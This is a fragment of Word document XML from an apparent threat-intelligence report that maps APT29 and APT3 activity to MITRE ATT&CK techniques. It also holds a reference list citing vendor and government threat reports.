            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F6445E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Data from Information Repositories</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6402E99E" w14:textId="29D98427" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EC94377" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="005B3D45" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="653" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A2E09BD" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1071" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="03388BE1" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-COL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5ADFA7" w14:textId="58297D29" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00F24917">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[3] Attacker able to collect data via this account. Here using the Cobalt Strike installation above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w14:paraId="15736E49" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="080204A1" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5078408C" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30510D35" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="307475A2" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED19759" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="49A826D2" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52E618EF" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60577013" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="008D6D8A" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="61"/>
      <w:tr w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w14:paraId="5AF4056A" w14:textId="77777777" w:rsidTr="00E545CD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="436" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2DE1B15A" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1794" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="465DA7A8" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2660" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11F5A955" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="728" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="186DD86E" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4914B06E" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="00B857D7" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="671" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="39C135D7" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="443B56B1" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3379991F" w14:textId="77777777" w:rsidR="00CC1D94" w:rsidRPr="008D6D8A" w:rsidRDefault="00CC1D94" w:rsidP="00FD53AB">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="27973480" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="0077286F" w:rsidRDefault="00D70BED" w:rsidP="00D70BED"/>
    <w:p w14:paraId="6EC5E6A4" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="00C94979" w:rsidRDefault="00D70BED" w:rsidP="00D70BED"/>
    <w:p w14:paraId="392E211B" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">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39B8E8A5" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="004029BD" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">[1] </w:t>
      </w:r>
      <w:hyperlink r:id="rId72" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ESET_Operation_Ghost_Dukes.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2019]</w:t>
      </w:r>
      <w:r w:rsidRPr="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>22}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C1C1A2" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:r w:rsidRPr="00B23FA5">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>New sophisticated email-based attack from NOBELIUM - Microsoft Security Blog</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:t xml:space="preserve"> [2021] </w:t>
      </w:r>
      <w:r w:rsidRPr="004029BD">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>{18}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752E2676" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRPr="000E5941" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:r>
        <w:t xml:space="preserve">[3] </w:t>
      </w:r>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>eset_threat_report_t32021.pdf (welivesecurity.com)</w:t>
        </w:r>
      </w:hyperlink>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">   {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>33}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06866911" w14:textId="746EFA3F" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:r>
        <w:t xml:space="preserve">[4] </w:t>
      </w:r>
      <w:hyperlink r:id="rId75" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CERTFR-2021-CTI-011.pdf (ssi.gouv.fr)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (not directly ATT&amp;CK but linked from [3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D796FBD" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:r>
        <w:t xml:space="preserve">[5] </w:t>
      </w:r>
      <w:hyperlink r:id="rId76" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Assembling the Russian Nesting Doll: UNC2452 Merged into APT29 | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (additional to ATT&amp;CK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C09933" w14:textId="77777777" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:r>
        <w:t xml:space="preserve">[6] </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>PowerDuke</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">: Widespread Post-Election Spear Phishing Campaigns Targeting Think Tanks and NGOs | </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Volexity</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (this is referenced on p7 of [1] in description of attack) [2016]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C216F8" w14:textId="266C9E35" w:rsidR="00D70BED" w:rsidRDefault="00D70BED" w:rsidP="00D70BED">
      <w:r>
        <w:t xml:space="preserve">[7] </w:t>
      </w:r>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>CVE-2021-36934 - Security Update Guide - Microsoft - Windows Elevation of Privilege Vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via [3])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3C84A0" w14:textId="06C530CC" w:rsidR="00B01B16" w:rsidRPr="00B23FA5" w:rsidRDefault="00B01B16" w:rsidP="00D70BED">
      <w:r>
        <w:t xml:space="preserve">[8] </w:t>
      </w:r>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming | Mandiant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> (via Google search “APT29 Lateral Movement” and </w:t>
      </w:r>
      <w:hyperlink r:id="rId80" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve">APT29 Persistence / Lateral Movement via Windows Credential Roaming | Threat </w:t>
        </w:r>
        <w:proofErr w:type="spellStart"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SnapShot</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t xml:space="preserve"> - YouTube</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A927B" w14:textId="247FE060" w:rsidR="00891095" w:rsidRDefault="00891095" w:rsidP="00D54779">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="1F3763" w:themeColor="accent1" w:themeShade="7F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A8BAAE" w14:textId="6E5E4C05" w:rsidR="001E0D48" w:rsidRDefault="001E0D48" w:rsidP="001E0D48">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="62" w:name="_Toc110935512"/>
      <w:bookmarkStart w:id="63" w:name="_Toc153480858"/>
      <w:r w:rsidRPr="009A05C9">
        <w:lastRenderedPageBreak/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t>PT 3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="7136BA37" w14:textId="77777777" w:rsidR="00FC3056" w:rsidRPr="005B4630" w:rsidRDefault="00FC3056" w:rsidP="00FC3056">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc153480859"/>
      <w:r>
        <w:t>ATT&amp;CK Technique Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="4AA84246" w14:textId="77777777" w:rsidR="00AF3C09" w:rsidRPr="00AF3C09" w:rsidRDefault="00AF3C09" w:rsidP="00AF3C09">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">The Group </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TechChain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> for G0022 - APT3 is </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34035385" w14:textId="77777777" w:rsidR="00AF3C09" w:rsidRPr="00AF3C09" w:rsidRDefault="00AF3C09" w:rsidP="00AF3C09">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group ATT&amp;CK attribution is China</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA7D1DB" w14:textId="77777777" w:rsidR="00AF3C09" w:rsidRPr="00AF3C09" w:rsidRDefault="00AF3C09" w:rsidP="00AF3C09">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Group TCERT attribution is CN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072AB5C6"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0043 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reconnaissance []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C201C"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0042 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Resource Development []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B887F8"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0001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Initial Access ['T1566.002', 'T1078.002']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20451EF8"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T1566.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Phishing&gt;:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Spearphishing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C1DCE6"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T1078.002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Valid Accounts&gt;:Domain Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26441E00"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0002 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Execution ['T1204.001', 'T1203', 'T1059.003', 'T1053.005', 'T1059.001']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FB38E"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T1204.001 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;User Execution&gt;:Malicious Link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD801FD"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1203 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploitation for Client Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D1119D"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T1059.003 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Command and Scripting Interpreter&gt;:Windows Command Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509D918C"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T1053.005 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00AF3C09">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;Scheduled Task/Job&gt;:Scheduled Task</w:t>
      </w:r>
    </w:p>
